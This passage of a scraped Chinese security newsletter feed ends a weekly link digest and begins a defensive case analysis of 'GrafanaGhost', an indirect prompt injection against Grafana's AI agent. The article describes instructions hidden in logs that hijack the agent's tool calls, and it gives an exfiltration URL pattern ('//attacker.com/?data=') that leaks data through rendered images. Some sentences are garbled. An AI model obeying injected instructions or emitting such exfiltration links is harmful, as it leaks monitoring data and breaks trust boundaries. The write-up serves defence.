flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">SpecterOps发布Janus工具，解析C2日志以识别操作摩擦与改进点</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://specterops.io/blog/2026/04/10/janus-listen-to-your-logs/" target="_blank">https://specterops.io/blog/2026/04/10/janus-listen-to-your-logs/</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">开源工具 notyet 利用 AWS IAM 凭证撤销的 4 秒传播窗口，测试攻击者在凭证被禁用后维持持久访问的能力</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://www.offensai.com/blog/notyet-aws-iam-credential-revocation-gaps" target="_blank">https://www.offensai.com/blog/notyet-aws-iam-credential-revocation-gaps</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">提出检测管道成熟度模型，高级阶段包含原子高保真检测和基于风险的自定义规则，领先阶段加入数据科学支持的异常检测和蜜标等欺骗技术</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://detect.fyi/detection-pipeline-maturity-model-076984779651?gi=d957c7287ef3" target="_blank">https://detect.fyi/detection-pipeline-maturity-model-076984779651?gi=d957c7287ef3</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Google API密钥安全策略因Gemini模型改变，影响密钥管理与安全实践</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://trufflesecurity.com/blog/google-api-keys-werent-secrets-but-then-gemini-changed-the-rules" target="_blank">https://trufflesecurity.com/blog/google-api-keys-werent-secrets-but-then-gemini-changed-the-rules</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Praetorian 开源 Titus 秘密扫描器，用于大规模项目中的凭据检测</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://www.praetorian.com/blog/titus-open-source-secret-scanner" target="_blank">https://www.praetorian.com/blog/titus-open-source-secret-scanner</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">攻击者滥用 TruffleHog 等合法密钥扫描工具，通过凭证发现、权限枚举、数据访问的固定流程实施云攻击</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://blog.qualys.com/qualys-insights/2026/02/19/how-security-tool-misuse-is-reshaping-cloud-compromise" target="_blank">https://blog.qualys.com/qualys-insights/2026/02/19/how-security-tool-misuse-is-reshaping-cloud-compromise</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">删除IAM用户前未更新KMS密钥策略导致权限问题</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://sirantd.com/how-i-overlooked-the-problem-and-shot-myself-in-the-foot-06841414e1de?gi=0427208af6c5" target="_blank">https://sirantd.com/how-i-overlooked-the-problem-and-shot-myself-in-the-foot-06841414e1de?gi=0427208af6c5</a></span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="display: flex;flex-flow: row;margin: 10px 0%;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;flex: 20 20 0%;align-self: flex-start;height: auto;box-sizing: border-box;"><div style="margin: -5px 0%;text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;padding: 0px 6px;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;"><img class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="jpeg" data-w="344" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;height: auto !important;" data-imgfileid="100011306" data-aistatus="1" src="https://wechat2rss.xlab.app/img-proxy/?k=ec197c85&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FuZT6kWW1jCkEftyibjTpXIAmlqWDYnrPGqFibYiatnIYG3BDPDEB17tEyc6I6PdbYAQBial0DeticBnrSKUibd638z7f2hGPTMLpK7qgWaQ6ePot8%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></p></div></div></div></div><div style="display: inline-block;vertical-align: top;width: auto;flex: 100 100 0%;align-self: flex-start;height: auto;padding: 0px 0px 0px 20px;box-sizing: border-box;"><div style="color: rgb(67, 146, 117);font-size: 19px;letter-spacing: 2px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">M01N Team公众号</span></strong></p></div><div style="margin: 10px 0%;box-sizing: border-box;"><div style="font-size: 13px;color: rgb(160, 160, 160);text-align: justify;line-height: 1.6;letter-spacing: 1px;padding: 0px 3px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">聚焦高级攻防对抗热点技术</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">绿盟科技蓝军技术研究战队</span></p></div></div></div></div><div style="display: flex;flex-flow: row;margin: 10px 0%;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;flex: 20 20 0%;align-self: flex-start;height: auto;box-sizing: border-box;"><div style="margin: -5px 0%;text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;padding: 0px 6px;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;"><img class="rich_pages wxw-img" data-ratio="0.9145907473309609" data-s="300,640" data-type="png" data-w="562" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;height: auto !important;" data-imgfileid="100011307" data-aistatus="1" src="https://wechat2rss.xlab.app/img-proxy/?k=f14f466d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FuZT6kWW1jCnpibF2sqLeluv7GExicubGraiac6TytL8Hict3f6MLibZ3GW5tJxWkKHvETQvicgOAHYlibxVFyvicPyEJViaAc08vtWSWWDoib3AHTN18w%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div></div></div></div><div style="display: inline-block;vertical-align: top;width: auto;flex: 100 100 0%;align-self: flex-start;height: auto;padding: 0px 0px 0px 20px;box-sizing: border-box;"><div style="color: rgb(67, 146, 117);font-size: 19px;letter-spacing: 2px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">官方攻防交流群</span></strong></p></div><div style="margin: 10px 0%;box-sizing: border-box;"><div style="font-size: 13px;color: rgb(160, 160, 160);text-align: justify;line-height: 1.6;letter-spacing: 1px;padding: 0px 3px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">网络安全一手资讯</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">攻防技术答疑解惑</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">扫码加好友即可拉群</span></p></div></div></div></div><div style="margin: 10px 0% 0px;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;background-color: rgb(67, 146, 117);min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;padding: 10px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;text-align: center;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);font-size: 17px;padding: 0px;line-height: 1;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><b style="box-sizing: border-box;"><span leaf="">往期推荐</span></b></p></div></div></div></div><div style="display: flex;flex-flow: row;margin: 10px 0%;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 100 100 0%;height: auto;align-self: center;box-sizing: border-box;"><div style="color: rgb(23, 54, 43);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a class="normal_text_link mp_article_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzkyMTI0NjA3OA==&amp;mid=2247494935&amp;idx=1&amp;sn=2087d14d42eb91ff972139ef7fefc5d5&amp;scene=21#wechat_redirect" textvalue="每周蓝军技术推送（2026.4.4-2026.4.10）" data-itemshowtype="0" linktype="text" data-linktype="2">每周蓝军技术推送（2026.4.4-2026.4.10）</a></span></p></div></div></div><div style="display: flex;flex-flow: row;margin: 10px 0%;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 100 100 0%;height: auto;align-self: center;box-sizing: border-box;"><div style="color: rgb(23, 54, 43);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a class="normal_text_link mp_article_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzkyMTI0NjA3OA==&amp;mid=2247494916&amp;idx=1&amp;sn=b01106658b570c0d850fb0a21ccbb036&amp;scene=21#wechat_redirect" textvalue="每周蓝军技术推送（2026.3.28-2026.4.3）" data-itemshowtype="0" linktype="text" data-linktype="2">每周蓝军技术推送（2026.3.28-2026.4.3）</a></span></p></div></div></div><div style="display: flex;flex-flow: row;margin: 10px 0%;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 100 100 0%;height: auto;align-self: center;box-sizing: border-box;"><div style="color: rgb(23, 54, 43);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a class="normal_text_link mp_article_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzkyMTI0NjA3OA==&amp;mid=2247494891&amp;idx=2&amp;sn=9fea43e1c6cc95791e2f62f236fdb987&amp;scene=21#wechat_redirect" textvalue="每周蓝军技术推送（2026.3.21-2026.3.27）" data-itemshowtype="0" linktype="text" data-linktype="2">每周蓝军技术推送（2026.3.21-2026.3.27）</a></span></p></div></div></div></div></div></div><p style="display: none;"><mp-style-type data-value="10000"></mp-style-type></p>



<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=cedd26ce&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzkyMTI0NjA3OA%3D%3D%26mid%3D2247494984%26idx%3D1%26sn%3Dea46bd4807fef8f239f9ccf214502a09">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Fri, 17 Apr 2026 18:00:00 +0800</pubDate>
    </item>
    <item>
      <title>AI安全案例分析 | Grafana 平台零点击间接注入威胁</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzkyMTI0NjA3OA==&amp;mid=2247494946&amp;idx=1&amp;sn=cfb436b16c06bf1e2fda6abfc1d7a050</link>
      <description>近日，安全研究机构 Noma Security 披露了 Grafana 平台 AI 功能组件中存在的高危安全漏洞，推测为“GrafanaGhost”（案件编号：AIS-DATA-2026-101）。</description>
      <content:encoded><![CDATA[<p>原创 <span>天元实验室</span> <span>2026-04-13 18:00</span> <span style="display: inline-block;">北京</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=47fd4c09&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FuZT6kWW1jCkSpdXISysshLIEm7N7icCKIxLalQMyOC5KEDm6j96WhP0ibjw9Kicx1wwb7lb5MCJguoMWwOJqtPkMT4JvnuSEC41qxAthsvgbrk%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>近日，安全研究机构 Noma Security 披露了 Grafana 平台 AI 功能组件中存在的高危安全漏洞，推测为“GrafanaGhost”（案件编号：AIS-DATA-2026-101）。</p>
  <div style="box-sizing: border-box;font-style: normal;font-weight: 400;text-align: justify;font-size: 16px;color: rgb(62, 62, 62);" data-pm-slice="0 0 []"><div style="display: flex;flex-flow: row;margin: 7px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;width: 20px;vertical-align: top;flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;background-color: rgb(67, 146, 117);box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="gif" data-w="300" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100011289" src="https://wechat2rss.xlab.app/img-proxy/?k=d698d39b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FuZT6kWW1jCmVVxcHXfpBpEjgSibzbVDVXENVmI6GkkEmZ0kia3UqM1wtO7zicMQ3cF4bFYI5y801RdrOx7APfvLnUxcoNr51kG4nsTPTrjupAA%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="font-size: 20px;line-height: 1;letter-spacing: 1px;padding: 0px 8px;text-align: justify;color: rgb(67, 146, 117);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><b style="box-sizing: border-box;"><span leaf="">概述</span></b></p></div></div></div><div style="display: flex;flex-flow: row;margin: 0px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;border-left: 3px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;flex: 100 100 0%;align-self: flex-start;height: auto;border-bottom: 3px solid rgb(67, 146, 117);border-bottom-right-radius: 0px;padding: 0px 10px 10px 20px;box-sizing: border-box;"><div style="line-height: 1.8;letter-spacing: 1px;padding: 0px;text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">近日，安全研究机构 Noma Security 披露了 Grafana 平台 AI 功能组件中存在的高危安全漏洞，推测为“GrafanaGhost”（案件编号：AIS-DATA-2026-101）。攻击者可利用间接提示注入（Indirect Prompt Injection）技术，在无任何用户交互的“零点击”场景下，诱发 Grafana AI智能体跨越信任边界，非法调用内部查询敏感监控数据，并对外传工具。此漏洞凸显了AI智能体在处理不可信的外部输入时，被转化为“数据外泄执行主体”的严重安全风险。</span></p></div></div></div><div style="display: flex;flex-flow: row;margin: 10px 0%;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: bottom;width: auto;align-self: flex-end;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="margin: 10px 0% 0px;box-sizing: border-box;"><div style="font-family: Optima-Regular, PingFangTC-light;color: rgb(67, 146, 117);font-size: 18px;line-height: 1;text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="box-sizing: border-box;"><span leaf="">01 攻击原理核心</span></span></strong></p></div></div></div></div><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">GrafanaGhost 漏洞的本质是</span><strong style="box-sizing: border-box;"><span leaf="">大数据平面模型（LLM）控制平面与数据平面模型的交互</span></strong><strong style="box-sizing: border-box;"><span leaf="">。</span></strong><span leaf="">当 Grafana 的 AI 智能体（Agent）包含恶意指令的外部非受信（如错误日志、外部同样、第三方集成数据）时，未能有效实现上下文隔离。攻击者通过构造特定的语义提示，污染 AI 的上下文窗口，进一步内容劫持 AI 智能体的工具调用逻辑（Tool Calling），从而造成原有安全护栏，执行非预期的备份。</span></p><div style="display: flex;flex-flow: row;margin: 10px 0%;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: bottom;width: auto;align-self: flex-end;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="margin: 10px 0% 0px;box-sizing: border-box;"><div style="font-family: Optima-Regular, PingFangTC-light;color: rgb(67, 146, 117);font-size: 18px;line-height: 1;text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="box-sizing: border-box;"><span leaf="">02 攻击流程与层次架构</span></span></strong></p></div></div></div></div><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">本漏洞的攻击序列清晰，序列性极强。</span></p><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100011292" data-ratio="0.5425925925925926" data-s="300,640" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=f681d527&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FuZT6kWW1jCkroCTvv4VRLM7az6XQLzSUwic5AbdHzmbRW7LV1Hpic4LtCkDHQEtVmic3z9a7tQecxAB4YxovEaE5ZWmeKia2m7YHgLJToV1pxib4%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div><div style="box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">从外部输入到最终的数据窃取，攻击主路径可划分为以下四个系统：</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">第一层：攻击者（外部注入）：</span></strong></p><ul style="list-style-type: disc;box-sizing: border-box;padding-left: 20px;list-style-position: outside;" class="list-paddingleft-2"><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">构造负载负载（如隐藏指令的偏差日志/指标）</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">入口 Grafana 外部数据源</span></p></li></ul><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">第二层：AI智能体（应用层劫持）</span></strong></p><ul style="list-style-type: disc;box-sizing: border-box;padding-left: 20px;list-style-position: outside;" class="list-paddingleft-2"><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">读取受复制上下文（触发来源注入）</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">意图劫持限制（绕过系统提示）</span></p></li></ul><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">第三层：内部资源（数据核心查询）</span></strong></p><ul style="list-style-type: disc;box-sizing: border-box;padding-left: 20px;list-style-position: outside;" class="list-paddingleft-2"><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">抢夺合法工具调用权限</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">搜索敏感指标/用户行为数据</span></p></li></ul><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">第四层：数据外泄（带外传输）</span></strong></p><ul style="list-style-type: disc;box-sizing: border-box;padding-left: 20px;list-style-position: outside;" class="list-paddingleft-2"><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">数据建模至外部URL（如协议相对路径//attacker.com/?data=）</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">利用继承Markdown/图像渲染触发零点击外传</span></p></li></ul></div><div style="display: flex;flex-flow: row;margin: 10px 0%;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: bottom;width: auto;align-self: flex-end;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="margin: 10px 0% 0px;box-sizing: border-box;"><div style="font-family: Optima-Regular, PingFangTC-light;color: rgb(67, 146, 117);font-size: 18px;line-height: 1;text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="box-sizing: border-box;"><span leaf="">03 根本成因深度剖析</span></span></strong></p></div></div></div></div><div style="box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">执行上下文未沙箱化：</span></strong><span leaf="">AI在读取外部日志或数据源时，将其视为最高优先级的“指令”而非“串口数据”。这种解析逻辑缺陷导致了间接提示注入成功的。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">工具调用（Tool Calling）权限过大且缺乏审计：</span></strong><span leaf="">AI助手被赋予了直接查询基础数据库（如Prometheus、Loki）的高级权限，并且在执行敏感查询操作前，缺乏人机交互（HITL，人工介入确认）机制。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">叠加渲染策略与SSRF防护缺陷：</span></strong><span leaf="">平台在将AI生成的Markdown或图像标签渲染到用户界面时，未严格校验外部域白名单。攻击者利用协议相对URL等技巧绕过基础校验，打通了带外（OOB）数据外传通道。</span></p></div><div style="display: flex;flex-flow: row;margin: 10px 0%;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: bottom;width: auto;align-self: flex-end;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="margin: 10px 0% 0px;box-sizing: border-box;"><div style="font-family: Optima-Regular, PingFangTC-light;color: rgb(67, 146, 117);font-size: 18px;line-height: 1;text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="box-sizing: border-box;"><span leaf="">04 潜在影响评估</span></span></strong></p></div></div></div></div><ul style="list-style-type: disc;box-sizing: border-box;padding-left: 20px;list-style-position: outside;" 